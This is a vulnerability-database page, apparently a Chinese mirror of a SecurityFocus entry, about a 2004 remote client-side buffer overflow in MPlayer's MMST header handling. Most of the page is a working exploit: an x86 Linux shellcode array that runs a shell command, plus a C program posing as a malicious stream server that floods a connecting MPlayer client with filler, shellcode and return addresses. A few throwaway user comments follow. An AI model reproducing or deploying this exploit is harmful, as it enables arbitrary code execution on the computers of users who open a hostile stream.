MPlayer 0.9/1.0 – MMST Get_Header Remote Client-Side Buffer Overflow
漏洞ID | 1054813 | 漏洞类型 | |
发布时间 | 2004-12-15 | 更新时间 | 2004-12-15 |
CVE编号 | N/A |
CNNVD-ID | N/A |
漏洞平台 | Linux | CVSS评分 | N/A |
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
source: http://www.securityfocus.com/bid/11962/info
A remote, client-side buffer overflow vulnerability reportedly affects MPlayer. This issue is due to a failure of the application to properly validate the length of user-supplied strings prior to copying them into static process buffers.
An attacker may exploit this issue to execute arbitrary code with the privileges of the user that activated the vulnerable application. This may facilitate unauthorized access or privilege escalation.
char payload[] = {
0xeb ,0x47
,0x59
,0x89 ,0xca
,0x83 ,0xc2 ,0x18
,0x89 ,0x11
,0x31 ,0xc0
,0x89 ,0x41 ,0x04
,0x83 ,0xc2 ,0x13
,0x89 ,0x51 ,0x08
,0x83 ,0xc2 ,0x08
,0x89 ,0x51 ,0x0c
,0x83 ,0xc2 ,0x03
,0x89 ,0x51 ,0x10
,0x89 ,0x41 ,0x14
,0x88 ,0x41 ,0x2a
,0x88 ,0x41 ,0x32
,0x88 ,0x41 ,0x35
,0x88 ,0x41 ,0x3a
,0x51
,0x83 ,0xc1 ,0x08
,0x51
,0x83 ,0xc1 ,0x20
,0x83 ,0xc1 ,0x03
,0x51
,0x83 ,0xc0 ,0x3b
,0x50
,0xcd ,0x80
,0x31 ,0xc0
,0x50
,0x40
,0x50
,0xcd ,0x80
,0xe8 ,0xb4 ,0xff ,0xff ,0xff
,0x61 ,0x62 ,0x63 ,0x64 ,0x65 ,0x66
,0x67 ,0x68 ,0x69 ,0x6a ,0x6b ,0x6c
,0x6d ,0x6e ,0x6f ,0x70 ,0x71 ,0x72
,0x73 ,0x74 ,0x75 ,0x76 ,0x77 ,0x78
,0x50 ,0x41 ,0x54 ,0x48 ,0x3d ,0x2f
,0x62 ,0x69 ,0x6e ,0x3a ,0x2f ,0x75
,0x73 ,0x72 ,0x2f ,0x62 ,0x69 ,0x6e
,0x20 ,0x2f ,0x62 ,0x69 ,0x6e ,0x2f
,0x73 ,0x68 ,0x20 ,0x2d ,0x63 ,0x20
,0x72 ,0x6d ,0x20 ,0x78 ,0x2e
} ;
#include <stdio.h>
main()
{
char buf[256];
int len;
int s,i;
len=recv(0,buf,256,0);
printf("hellon");
fflush(stdout);
len=recv(0,buf,256,0);
printf("hellon");
fflush(stdout);
len=recv(0,buf,256,0);
putchar(0x03);
putchar(0x03);
putchar(0x03);
putchar(0x03);
putchar(0x03);
putchar(0x03);
putchar(0x03);
putchar(0x03);
fflush(stdout);
len=recv(0,buf,256,0);
putchar(0x03);
putchar(0x03);
putchar(0x03);
putchar(0x03);
putchar(0x03);
putchar(0x03);
putchar(0x03);
putchar(0x03);
putchar(0x03);
putchar(0x03);
putchar(0x03);
putchar(0x03);
for (i=0;i<50000;i++)
putchar('A');
for (i=0;i<sizeof payload;i++)
putchar (payload[i]);
printf("123");
for (i=0;i<20000;i++) // RA all the way....
{
putchar(0x01);
putchar(0x15);
putchar(0xbb);
putchar(0xbf);
}
fflush(stdout);
}
相关推荐: MegaBrowser < 0.71b - Multiple Vulnerabilities
MegaBrowser < 0.71b – Multiple Vulnerabilities 漏洞ID 1053928 漏洞类型 发布时间 2003-06-04 更新时间 2003-06-04 CVE编号 N/A CNNVD-ID N/A 漏洞平台 Mu…
© 版权声明
文章版权归作者所有,未经允许请勿转载。
THE END
喜欢就支持一下吧
恐龙抗狼扛1年前0
kankan啊啊啊啊3年前0
66666666666666